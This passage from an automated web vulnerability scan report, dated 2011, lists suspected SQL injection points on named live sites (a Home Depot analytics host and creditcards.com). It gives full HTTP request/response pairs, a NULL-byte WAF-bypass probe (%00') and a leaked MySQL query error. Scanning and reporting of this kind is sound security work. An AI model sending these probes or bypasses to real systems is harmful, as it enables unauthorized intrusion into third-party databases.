NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s16457054631772?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A39%3A5%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:20 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s16457054631772?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A39%3A5%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:20 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.55. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s19969816370798 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s19969816370798

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s19969816370798?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A48%3A54%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:05:25 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s19969816370798?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A48%3A54%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:05:25 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.56. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s23837734712508 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s23837734712508

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s23837734712508?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A8%3A3%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s23837734712508?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A8%3A3%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Omniture DC/2.0.0
xserver: www287
Content-Length: 0
Content-Type: text/html


1.57. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s24903706079207 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s24903706079207

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s24903706079207%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A1%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:46:55 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s24903706079207 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s24903706079207%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A1%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:46:55 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html


1.58. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s26866058967834 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s26866058967834

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s26866058967834%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A3%3A34%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:54:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s26866058967834 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s26866058967834%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A3%3A34%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:54:25 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.59. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s28965976873370 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s28965976873370

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s28965976873370%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A7%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:13:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s28965976873370 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s28965976873370%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A7%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:13:36 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.60. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s29808383558389 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s29808383558389

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/homedepot/1/H.22.1/s29808383558389?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A0%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:42:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s29808383558389 was not fou
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s29808383558389?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A0%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:42:01 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html


1.61. http://www.creditcards.com/oc/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?pid=22145581'&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:37 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3613
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:37 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22145581''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '22145581''; File: /usr/local/apach
...[SNIP]...

Request 2

GET /oc/?pid=22145581''&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:38 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705403888336438&data3=0&sid=1889&c=22145581%27%27
Vary: Accept-Encoding
Content-Length: 2765
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:38 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.62. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditcards.com
Path:   /oc//%2522ns%253D%2522netsparker%25280x000132%2529)

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
